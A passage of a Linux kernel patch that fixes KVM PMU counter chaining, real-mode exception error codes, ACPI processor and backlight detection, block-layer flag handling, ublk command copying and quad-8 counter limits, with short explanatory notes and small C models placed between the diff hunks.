+-		event = perf_event_create_kernel_counter(&attr, -1, current,
++	event = perf_event_create_kernel_counter(&attr, -1, current,
+ 						 kvm_pmu_perf_overflow, pmc);
+-	}
+ 
+ 	if (IS_ERR(event)) {
+ 		pr_err_once("kvm: pmu event creation failed %ld\n",
+@@ -704,41 +614,6 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ 	pmc->perf_event = event;
+ }
+ 
+-/**
+- * kvm_pmu_update_pmc_chained - update chained bitmap
+- * @vcpu: The vcpu pointer
+- * @select_idx: The number of selected counter
+- *
+- * Update the chained bitmap based on the event type written in the
+- * typer register and the enable state of the odd register.
+- */
+-static void kvm_pmu_update_pmc_chained(struct kvm_vcpu *vcpu, u64 select_idx)
+-{
+-	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	struct kvm_pmc *pmc = &pmu->pmc[select_idx], *canonical_pmc;
+-	bool new_state, old_state;
+-
+-	old_state = kvm_pmu_pmc_is_chained(pmc);
+-	new_state = kvm_pmu_idx_has_chain_evtype(vcpu, pmc->idx) &&
+-		    kvm_pmu_counter_is_enabled(vcpu, pmc->idx | 0x1);
+-
+-	if (old_state == new_state)
+-		return;
+-
+-	canonical_pmc = kvm_pmu_get_canonical_pmc(pmc);
+-	kvm_pmu_stop_counter(vcpu, canonical_pmc);
+-	if (new_state) {
+-		/*
+-		 * During promotion from !chained to chained we must ensure
+-		 * the adjacent counter is stopped and its event destroyed
+-		 */
+-		kvm_pmu_stop_counter(vcpu, kvm_pmu_get_alternate_pmc(pmc));
+-		set_bit(pmc->idx >> 1, vcpu->arch.pmu.chained);
+-		return;
+-	}
+-	clear_bit(pmc->idx >> 1, vcpu->arch.pmu.chained);
+-}
+-
+ /**
+  * kvm_pmu_set_counter_event_type - set selected counter to monitor some event
+  * @vcpu: The vcpu pointer
+@@ -766,7 +641,6 @@ void kvm_pmu_set_counter_event_type(struct kvm_vcpu *vcpu, u64 data,
+ 
+ 	__vcpu_sys_reg(vcpu, reg) = data & mask;
+ 
+-	kvm_pmu_update_pmc_chained(vcpu, select_idx);
+ 	kvm_pmu_create_perf_event(vcpu, select_idx);
+ }
+ 
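
The rewrite above removes the chained-counter bookkeeping (canonical/alternate PMC pairs and the per-vCPU chained bitmap) and instead emulates ARMv8's CHAIN event by propagation: when a 32-bit even counter wraps, kvm_pmu_counter_increment() re-enters itself for the odd neighbour with the CHAIN event. A small userspace model of that propagation follows; the event numbers and counter array are stand-ins, and the real code also honours PMCR_EL0.E, the enable mask, and 64-bit cycle-counter overflow.

#include <stdint.h>
#include <stdio.h>

#define NCOUNTERS	4
#define EVT_CHAIN	0x1e	/* stand-in for ARMV8_PMUV3_PERFCTR_CHAIN */

static uint32_t cnt[NCOUNTERS];
static uint32_t evtype[NCOUNTERS];
static uint32_t overflow;	/* one bit per counter */

/*
 * Increment every counter in @mask programmed with @event; on 32-bit
 * wrap, flag the overflow and propagate to the odd neighbour as a
 * CHAIN event.
 */
static void counter_increment(unsigned long mask, uint32_t event)
{
	int i;

	for (i = 0; i < NCOUNTERS; i++) {
		if (!(mask & (1UL << i)) || evtype[i] != event)
			continue;
		if (++cnt[i])
			continue;	/* no wrap, move on */
		overflow |= 1U << i;
		if (!(i & 1) && i + 1 < NCOUNTERS)
			counter_increment(1UL << (i + 1), EVT_CHAIN);
	}
}

int main(void)
{
	evtype[0] = 0x11;		/* some event on counter 0 */
	evtype[1] = EVT_CHAIN;		/* counter 1 chained on top */
	cnt[0] = 0xffffffffu;		/* one tick away from wrapping */

	counter_increment(1UL << 0, 0x11);
	printf("cnt0=%u cnt1=%u overflow=0x%x\n", cnt[0], cnt[1], overflow);
	return 0;
}

The run prints cnt0=0 cnt1=1 overflow=0x1: the even counter wrapped, its overflow bit was set, and the chained odd counter ticked once.
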
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index bfe4f17232b3e..1f80e17a64608 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -697,13 +697,15 @@ static bool access_pmcr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ 		return false;
+ 
+ 	if (p->is_write) {
+-		/* Only update writeable bits of PMCR */
++		/*
++		 * Only update writeable bits of PMCR (continuing into
++		 * kvm_pmu_handle_pmcr() as well)
++		 */
+ 		val = __vcpu_sys_reg(vcpu, PMCR_EL0);
+ 		val &= ~ARMV8_PMU_PMCR_MASK;
+ 		val |= p->regval & ARMV8_PMU_PMCR_MASK;
+ 		if (!kvm_supports_32bit_el0())
+ 			val |= ARMV8_PMU_PMCR_LC;
+-		__vcpu_sys_reg(vcpu, PMCR_EL0) = val;
+ 		kvm_pmu_handle_pmcr(vcpu, val);
+ 		kvm_vcpu_pmu_restore_guest(vcpu);
+ 	} else {
+diff --git a/arch/s390/kvm/intercept.c b/arch/s390/kvm/intercept.c
+index 88112065d9411..ee7478a601442 100644
+--- a/arch/s390/kvm/intercept.c
++++ b/arch/s390/kvm/intercept.c
+@@ -271,10 +271,18 @@ static int handle_prog(struct kvm_vcpu *vcpu)
+  * handle_external_interrupt - used for external interruption interceptions
+  * @vcpu: virtual cpu
+  *
+- * This interception only occurs if the CPUSTAT_EXT_INT bit was set, or if
+- * the new PSW does not have external interrupts disabled. In the first case,
+- * we've got to deliver the interrupt manually, and in the second case, we
+- * drop to userspace to handle the situation there.
++ * This interception occurs if:
++ * - the CPUSTAT_EXT_INT bit was already set when the external interrupt
++ *   occurred. In this case, the interrupt needs to be injected manually to
++ *   preserve interrupt priority.
++ * - the external new PSW has external interrupts enabled, which will cause an
++ *   interruption loop. We drop to userspace in this case.
++ *
++ * The latter case can be detected by inspecting the external mask bit in the
++ * external new psw.
++ *
++ * Under PV, only the latter case can occur, since interrupt priorities are
++ * handled in the ultravisor.
+  */
+ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ {
+@@ -285,10 +293,18 @@ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ 
+ 	vcpu->stat.exit_external_interrupt++;
+ 
+-	rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
+-	if (rc)
+-		return rc;
+-	/* We can not handle clock comparator or timer interrupt with bad PSW */
++	if (kvm_s390_pv_cpu_is_protected(vcpu)) {
++		newpsw = vcpu->arch.sie_block->gpsw;
++	} else {
++		rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
++		if (rc)
++			return rc;
++	}
++
++	/*
++	 * Clock comparator or timer interrupt with external interrupt enabled
++	 * will cause interrupt loop. Drop to userspace.
++	 */
+ 	if ((eic == EXT_IRQ_CLK_COMP || eic == EXT_IRQ_CPU_TIMER) &&
+ 	    (newpsw.mask & PSW_MASK_EXT))
+ 		return -EOPNOTSUPP;
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 518bda50068cb..0f762070a5e10 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -146,7 +146,11 @@ static int __init acpi_parse_madt(struct acpi_table_header *table)
+ 
+ 		pr_debug("Local APIC address 0x%08x\n", madt->address);
+ 	}
+-	if (madt->header.revision >= 5)
++
++	/* ACPI 6.3 and newer support the online capable bit. */
++	if (acpi_gbl_FADT.header.revision > 6 ||
++	    (acpi_gbl_FADT.header.revision == 6 &&
++	     acpi_gbl_FADT.minor_revision >= 3))
+ 		acpi_support_online_capable = true;
+ 
+ 	default_acpi_madt_oem_check(madt->header.oem_id,
+@@ -193,7 +197,8 @@ static bool __init acpi_is_processor_usable(u32 lapic_flags)
+ 	if (lapic_flags & ACPI_MADT_ENABLED)
+ 		return true;
+ 
+-	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_support_online_capable ||
++	    (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
+ 		return true;
+ 
+ 	return false;
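
The acpi_is_processor_usable() fix inverts the guard: a disabled LAPIC entry is usable either when the firmware predates the online-capable bit (its absence then means nothing) or when the bit is actually set, whereas the old code wrongly required both bit support and the bit. A truth-table sketch of the post-fix logic; the flag values are stand-ins for the ACPI_MADT_* definitions.

#include <stdbool.h>
#include <stdio.h>

#define MADT_ENABLED		(1u << 0)
#define MADT_ONLINE_CAPABLE	(1u << 1)

/*
 * Post-fix logic: a disabled CPU is still usable when the firmware
 * either predates the online-capable bit or explicitly sets it.
 */
static bool usable(bool fw_has_online_capable, unsigned int flags)
{
	if (flags & MADT_ENABLED)
		return true;
	if (!fw_has_online_capable || (flags & MADT_ONLINE_CAPABLE))
		return true;
	return false;
}

int main(void)
{
	printf("old fw, disabled:            %d\n", (int)usable(false, 0));
	printf("new fw, disabled, capable:   %d\n",
	       (int)usable(true, MADT_ONLINE_CAPABLE));
	printf("new fw, disabled, incapable: %d\n", (int)usable(true, 0));
	return 0;
}
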
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 1d00f7824da1e..8e56ec6e72e9d 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3845,7 +3845,12 @@ static void nested_vmx_inject_exception_vmexit(struct kvm_vcpu *vcpu)
+ 		exit_qual = 0;
+ 	}
+ 
+-	if (ex->has_error_code) {
++	/*
++	 * Unlike AMD's Paged Real Mode, which reports an error code on #PF
++	 * VM-Exits even if the CPU is in Real Mode, Intel VMX never sets the
++	 * "has error code" flags on VM-Exit if the CPU is in Real Mode.
++	 */
++	if (ex->has_error_code && is_protmode(vcpu)) {
+ 		/*
+ 		 * Intel CPUs do not generate error codes with bits 31:16 set,
+ 		 * and more importantly VMX disallows setting bits 31:16 in the
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index ab09d292bdede..3463ef7f30196 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9853,13 +9853,20 @@ int kvm_check_nested_events(struct kvm_vcpu *vcpu)
+ 
+ static void kvm_inject_exception(struct kvm_vcpu *vcpu)
+ {
++	/*
++	 * Suppress the error code if the vCPU is in Real Mode, as Real Mode
++	 * exceptions don't report error codes.  The presence of an error code
++	 * is carried with the exception and only stripped when the exception
++	 * is injected as intercepted #PF VM-Exits for AMD's Paged Real Mode do
++	 * report an error code despite the CPU being in Real Mode.
++	 */
++	vcpu->arch.exception.has_error_code &= is_protmode(vcpu);
++
+ 	trace_kvm_inj_exception(vcpu->arch.exception.vector,
+ 				vcpu->arch.exception.has_error_code,
+ 				vcpu->arch.exception.error_code,
+ 				vcpu->arch.exception.injected);
+ 
+-	if (vcpu->arch.exception.error_code && !is_protmode(vcpu))
+-		vcpu->arch.exception.error_code = false;
+ 	static_call(kvm_x86_inject_exception)(vcpu);
+ }
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index aa67a52c5a069..1b04a1c48ee50 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1327,8 +1327,6 @@ bool blk_rq_is_poll(struct request *rq)
+ 		return false;
+ 	if (rq->mq_hctx->type != HCTX_TYPE_POLL)
+ 		return false;
+-	if (WARN_ON_ONCE(!rq->bio))
+-		return false;
+ 	return true;
+ }
+ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+@@ -1336,7 +1334,7 @@ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+ static void blk_rq_poll_completion(struct request *rq, struct completion *wait)
+ {
+ 	do {
+-		bio_poll(rq->bio, NULL, 0);
++		blk_mq_poll(rq->q, blk_rq_to_qc(rq), NULL, 0);
+ 		cond_resched();
+ 	} while (!completion_done(wait));
+ }
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index 847721dc2b2b8..f1bc600c4ded6 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -1066,7 +1066,6 @@ static void tg_dispatch_one_bio(struct throtl_grp *tg, bool rw)
+ 	sq->nr_queued[rw]--;
+ 
+ 	throtl_charge_bio(tg, bio);
+-	bio_set_flag(bio, BIO_BPS_THROTTLED);
+ 
+ 	/*
+ 	 * If our parent is another tg, we just need to transfer @bio to
+@@ -1079,6 +1078,7 @@ static void tg_dispatch_one_bio(struct throtl_grp *tg, bool rw)
+ 		throtl_add_bio_tg(bio, &tg->qnode_on_parent[rw], parent_tg);
+ 		start_parent_slice_with_credit(tg, parent_tg, rw);
+ 	} else {
++		bio_set_flag(bio, BIO_BPS_THROTTLED);
+ 		throtl_qnode_add_bio(bio, &tg->qnode_on_parent[rw],
+ 				     &parent_sq->queued[rw]);
+ 		BUG_ON(tg->td->nr_queued[rw] <= 0);
+diff --git a/block/genhd.c b/block/genhd.c
+index 0b6928e948f31..62a61388e752d 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -368,7 +368,6 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+ 
+-	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	/*
+ 	 * If the device is opened exclusively by current thread already, it's
+ 	 * safe to scan partitons, otherwise, use bd_prepare_to_claim() to
+@@ -381,12 +380,19 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 			return ret;
+ 	}
+ 
++	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+ 		ret =  PTR_ERR(bdev);
+ 	else
+ 		blkdev_put(bdev, mode & ~FMODE_EXCL);
+ 
++	/*
++	 * If blkdev_get_by_dev() failed early, GD_NEED_PART_SCAN is still set,
++	 * and re-assembling a partitioned raid device would then create
++	 * partitions for the underlying disk.
++	 */
++	clear_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(disk->part0, disk_scan_partitions);
+ 	return ret;
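
The genhd reordering arms GD_NEED_PART_SCAN only after the exclusive claim succeeds, and explicitly disarms it once the blkdev_get_by_dev() attempt is over, so an early failure cannot leave a stale "rescan" flag for the next opener of the disk to act on. A minimal flag-lifetime model of that ordering:

#include <stdbool.h>
#include <stdio.h>

static bool need_part_scan;

static int open_dev(bool claim_ok, bool open_ok)
{
	int ret;

	if (!claim_ok)
		return -1;	/* fail before the flag is ever armed */

	need_part_scan = true;	/* armed only once claiming worked */
	ret = open_ok ? 0 : -1;

	/*
	 * Always disarm: a failed open must not leave the flag set
	 * for the next opener of the same disk.
	 */
	need_part_scan = false;
	return ret;
}

int main(void)
{
	open_dev(false, false);
	printf("after failed claim: flag=%d\n", (int)need_part_scan);
	open_dev(true, false);
	printf("after failed open:  flag=%d\n", (int)need_part_scan);
	return 0;
}
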
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index 0c79f463fbfd4..ed318485eb192 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -1984,6 +1984,7 @@ static int instance;
+ static int acpi_video_bus_add(struct acpi_device *device)
+ {
+ 	struct acpi_video_bus *video;
++	bool auto_detect;
+ 	int error;
+ 	acpi_status status;
+ 
+@@ -2045,10 +2046,20 @@ static int acpi_video_bus_add(struct acpi_device *device)
+ 	mutex_unlock(&video_list_lock);
+ 
+ 	/*
+-	 * The userspace visible backlight_device gets registered separately
+-	 * from acpi_video_register_backlight().
++	 * If backlight-type auto-detection is used then a native backlight may
++	 * show up later and this may change the result from video to native.
++	 * Therefore normally the userspace visible /sys/class/backlight device
++	 * gets registered separately by the GPU driver calling
++	 * acpi_video_register_backlight() when an internal panel is detected.
++	 * Register the backlight now when not using auto-detection, so that
++	 * when the kernel cmdline or DMI-quirks are used the backlight will
++	 * get registered even if acpi_video_register_backlight() is not called.
+ 	 */
+ 	acpi_video_run_bcl_for_osi(video);
++	if (__acpi_video_get_backlight_type(false, &auto_detect) == acpi_backlight_video &&
++	    !auto_detect)
++		acpi_video_bus_register_backlight(video);
++
+ 	acpi_video_bus_add_notify_handler(video);
+ 
+ 	return 0;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index f06b3d3556710..42b5af5490a11 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -274,6 +274,43 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
++	/*
++	 * Models which need acpi_video backlight control where the GPU drivers
++	 * do not call acpi_video_register_backlight() because no internal panel
++	 * is detected. Typically these are all-in-ones (monitors with builtin
++	 * PC) where the panel connection shows up as regular DP instead of eDP.
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,1 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,1"),
++		},
++	},
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,2 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,2"),
++		},
++	},
++
++	/*
++	 * Older models with nvidia GPU which need acpi_video backlight
++	 * control and where the old nvidia binary driver series does not
++	 * call acpi_video_register_backlight().
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* ThinkPad W530 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
++		},
++	},
++
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+@@ -772,7 +809,7 @@ static bool prefer_native_over_acpi_video(void)
+  * Determine which type of backlight interface to use on this system,
+  * First check cmdline, then dmi quirks, then do autodetect.
+  */
+-static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
++enum acpi_backlight_type __acpi_video_get_backlight_type(bool native, bool *auto_detect)
+ {
+ 	static DEFINE_MUTEX(init_mutex);
+ 	static bool nvidia_wmi_ec_present;
+@@ -797,6 +834,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 		native_available = true;
+ 	mutex_unlock(&init_mutex);
+ 
++	if (auto_detect)
++		*auto_detect = false;
++
+ 	/*
+ 	 * The below heuristics / detection steps are in order of descending
+ 	 * precedence. The commandline takes precedence over anything else.
+@@ -808,6 +848,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (acpi_backlight_dmi != acpi_backlight_undef)
+ 		return acpi_backlight_dmi;
+ 
++	if (auto_detect)
++		*auto_detect = true;
++
+ 	/* Special cases such as nvidia_wmi_ec and apple gmux. */
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+@@ -827,15 +870,4 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	/* No ACPI video/native (old hw), use vendor specific fw methods. */
+ 	return acpi_backlight_vendor;
+ }
+-
+-enum acpi_backlight_type acpi_video_get_backlight_type(void)
+-{
+-	return __acpi_video_get_backlight_type(false);
+-}
+-EXPORT_SYMBOL(acpi_video_get_backlight_type);
+-
+-bool acpi_video_backlight_use_native(void)
+-{
+-	return __acpi_video_get_backlight_type(true) == acpi_backlight_native;
+-}
+-EXPORT_SYMBOL(acpi_video_backlight_use_native);
++EXPORT_SYMBOL(__acpi_video_get_backlight_type);
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 22a790d512842..2ed994a313a91 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -233,7 +233,7 @@ static int ublk_validate_params(const struct ublk_device *ub)
+ 	if (ub->params.types & UBLK_PARAM_TYPE_BASIC) {
+ 		const struct ublk_param_basic *p = &ub->params.basic;
+ 
+-		if (p->logical_bs_shift > PAGE_SHIFT)
++		if (p->logical_bs_shift > PAGE_SHIFT || p->logical_bs_shift < 9)
+ 			return -EINVAL;
+ 
+ 		if (p->logical_bs_shift > p->physical_bs_shift)
+@@ -1202,9 +1202,10 @@ static void ublk_handle_need_get_data(struct ublk_device *ub, int q_id,
+ 	ublk_queue_cmd(ubq, req);
+ }
+ 
+-static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++static int __ublk_ch_uring_cmd(struct io_uring_cmd *cmd,
++			       unsigned int issue_flags,
++			       struct ublksrv_io_cmd *ub_cmd)
+ {
+-	struct ublksrv_io_cmd *ub_cmd = (struct ublksrv_io_cmd *)cmd->cmd;
+ 	struct ublk_device *ub = cmd->file->private_data;
+ 	struct ublk_queue *ubq;
+ 	struct ublk_io *io;
+@@ -1306,6 +1307,23 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ }
+ 
++static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++{
++	struct ublksrv_io_cmd *ub_src = (struct ublksrv_io_cmd *) cmd->cmd;
++	struct ublksrv_io_cmd ub_cmd;
++
++	/*
++	 * Not necessary for async retry, but let's keep it simple and always
++	 * copy the values to avoid any potential reuse.
++	 */
++	ub_cmd.q_id = READ_ONCE(ub_src->q_id);
++	ub_cmd.tag = READ_ONCE(ub_src->tag);
++	ub_cmd.result = READ_ONCE(ub_src->result);
++	ub_cmd.addr = READ_ONCE(ub_src->addr);
++
++	return __ublk_ch_uring_cmd(cmd, issue_flags, &ub_cmd);
++}
++
+ static const struct file_operations ublk_ch_fops = {
+ 	.owner = THIS_MODULE,
+ 	.open = ublk_ch_open,
+@@ -1886,6 +1904,8 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 		/* clear all we don't support yet */
+ 		ub->params.types &= UBLK_PARAM_TYPE_ALL;
+ 		ret = ublk_validate_params(ub);
++		if (ret)
++			ub->params.types = 0;
+ 	}
+ 	mutex_unlock(&ub->mutex);
+ 	ublk_put_device(ub);
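
The ublk change snapshots the four command fields with READ_ONCE() into a local struct before dispatch, so an async retry (or a submitter rewriting the shared buffer mid-flight) can never make the handler observe two different values for the same field. A userspace sketch of the snapshot-once pattern; READ_ONCE is written out in its usual volatile-cast form, and the struct layout is illustrative.

#include <stdint.h>
#include <stdio.h>

#define READ_ONCE(x) (*(const volatile __typeof__(x) *)&(x))

struct io_cmd { uint16_t q_id; uint16_t tag; int32_t result; uint64_t addr; };

/*
 * Snapshot shared fields exactly once; every later check and use sees
 * the same values even if the submitter rewrites the buffer meanwhile.
 */
static void handle(const struct io_cmd *shared)
{
	struct io_cmd snap;

	snap.q_id   = READ_ONCE(shared->q_id);
	snap.tag    = READ_ONCE(shared->tag);
	snap.result = READ_ONCE(shared->result);
	snap.addr   = READ_ONCE(shared->addr);

	printf("q=%u tag=%u addr=0x%llx\n",
	       snap.q_id, snap.tag, (unsigned long long)snap.addr);
}

int main(void)
{
	struct io_cmd c = { .q_id = 1, .tag = 7, .result = 0, .addr = 0x1000 };

	handle(&c);
	return 0;
}
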
+diff --git a/drivers/counter/104-quad-8.c b/drivers/counter/104-quad-8.c
+index deed4afadb298..d9cb937665cfc 100644
+--- a/drivers/counter/104-quad-8.c
++++ b/drivers/counter/104-quad-8.c
+@@ -97,10 +97,6 @@ struct quad8 {
+ 	struct quad8_reg __iomem *reg;
+ };
+ 
+-/* Borrow Toggle flip-flop */
+-#define QUAD8_FLAG_BT BIT(0)
+-/* Carry Toggle flip-flop */
+-#define QUAD8_FLAG_CT BIT(1)
+ /* Error flag */
+ #define QUAD8_FLAG_E BIT(4)
+ /* Up/Down flag */
+@@ -133,6 +129,9 @@ struct quad8 {
+ #define QUAD8_CMR_QUADRATURE_X2 0x10
+ #define QUAD8_CMR_QUADRATURE_X4 0x18
+ 
++/* Each Counter is 24 bits wide */
++#define LS7267_CNTR_MAX GENMASK(23, 0)
++
+ static int quad8_signal_read(struct counter_device *counter,
+ 			     struct counter_signal *signal,
+ 			     enum counter_signal_level *level)
+@@ -156,18 +155,10 @@ static int quad8_count_read(struct counter_device *counter,
+ {
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	struct channel_reg __iomem *const chan = priv->reg->channel + count->id;
+-	unsigned int flags;
+-	unsigned int borrow;
+-	unsigned int carry;
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	flags = ioread8(&chan->control);
+-	borrow = flags & QUAD8_FLAG_BT;
+-	carry = !!(flags & QUAD8_FLAG_CT);
+-
+-	/* Borrow XOR Carry effectively doubles count range */
+-	*val = (unsigned long)(borrow ^ carry) << 24;
++	*val = 0;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+ 
+@@ -191,8 +182,7 @@ static int quad8_count_write(struct counter_device *counter,
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	/* Only 24-bit values are supported */
+-	if (val > 0xFFFFFF)
++	if (val > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -378,7 +368,7 @@ static int quad8_action_read(struct counter_device *counter,
+ 
+ 	/* Handle Index signals */
+ 	if (synapse->signal->id >= 16) {
+-		if (priv->preset_enable[count->id])
++		if (!priv->preset_enable[count->id])
+ 			*action = COUNTER_SYNAPSE_ACTION_RISING_EDGE;
+ 		else
+ 			*action = COUNTER_SYNAPSE_ACTION_NONE;
+@@ -806,8 +796,7 @@ static int quad8_count_preset_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (preset > 0xFFFFFF)
++	if (preset > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -834,8 +823,7 @@ static int quad8_count_ceiling_read(struct counter_device *counter,
+ 		*ceiling = priv->preset[count->id];
+ 		break;
+ 	default:
+-		/* By default 0x1FFFFFF (25 bits unsigned) is maximum count */
+-		*ceiling = 0x1FFFFFF;
++		*ceiling = LS7267_CNTR_MAX;
+ 		break;
+ 	}
+ 
+@@ -850,8 +838,7 @@ static int quad8_count_ceiling_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (ceiling > 0xFFFFFF)
++	if (ceiling > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
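Replacing the repeated 0xFFFFFF literal with LS7267_CNTR_MAX built from GENMASK(23, 0) names the hardware limit once and keeps the three range checks in sync. A hedged, self-contained rendition (the kernel takes GENMASK() from <linux/bits.h>; it is re-derived here only so the sketch compiles on its own):

#include <errno.h>
#include <stdio.h>

/* Userspace rendition of the kernel's GENMASK() for unsigned long. */
#define GENMASK(h, l) \
	(((~0UL) << (l)) & (~0UL >> (sizeof(unsigned long) * 8 - 1 - (h))))

/* Each LS7267 counter register is 24 bits wide. */
#define LS7267_CNTR_MAX GENMASK(23, 0)

static int validate_count(unsigned long val)
{
	return val > LS7267_CNTR_MAX ? -ERANGE : 0;
}

int main(void)
{
	printf("max=%#lx ok=%d bad=%d\n", (unsigned long)LS7267_CNTR_MAX,
	       validate_count(0xFFFFFF), validate_count(0x1000000));
	return 0;
}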
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index 9240df53ed875..a8456d5441fc7 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -483,7 +483,7 @@ static struct pci_doe_mb *find_cdat_doe(struct device *uport)
+ 	return NULL;
+ }
+ 
+-#define CDAT_DOE_REQ(entry_handle)					\
++#define CDAT_DOE_REQ(entry_handle) cpu_to_le32				\
+ 	(FIELD_PREP(CXL_DOE_TABLE_ACCESS_REQ_CODE,			\
+ 		    CXL_DOE_TABLE_ACCESS_REQ_CODE_READ) |		\
+ 	 FIELD_PREP(CXL_DOE_TABLE_ACCESS_TABLE_TYPE,			\
+@@ -496,8 +496,8 @@ static void cxl_doe_task_complete(struct pci_doe_task *task)
+ }
+ 
+ struct cdat_doe_task {
+-	u32 request_pl;
+-	u32 response_pl[32];
++	__le32 request_pl;
++	__le32 response_pl[32];
+ 	struct completion c;
+ 	struct pci_doe_task task;
+ };
+@@ -531,10 +531,10 @@ static int cxl_cdat_get_length(struct device *dev,
+ 		return rc;
+ 	}
+ 	wait_for_completion(&t.c);
+-	if (t.task.rv < sizeof(u32))
++	if (t.task.rv < 2 * sizeof(__le32))
+ 		return -EIO;
+ 
+-	*length = t.response_pl[1];
++	*length = le32_to_cpu(t.response_pl[1]);
+ 	dev_dbg(dev, "CDAT length %zu\n", *length);
+ 
+ 	return 0;
+@@ -545,13 +545,13 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			       struct cxl_cdat *cdat)
+ {
+ 	size_t length = cdat->length;
+-	u32 *data = cdat->table;
++	__le32 *data = cdat->table;
+ 	int entry_handle = 0;
+ 
+ 	do {
+ 		DECLARE_CDAT_DOE_TASK(CDAT_DOE_REQ(entry_handle), t);
++		struct cdat_entry_header *entry;
+ 		size_t entry_dw;
+-		u32 *entry;
+ 		int rc;
+ 
+ 		rc = pci_doe_submit_task(cdat_doe, &t.task);
+@@ -560,26 +560,34 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			return rc;
+ 		}
+ 		wait_for_completion(&t.c);
+-		/* 1 DW header + 1 DW data min */
+-		if (t.task.rv < (2 * sizeof(u32)))
++
++		/* 1 DW Table Access Response Header + CDAT entry */
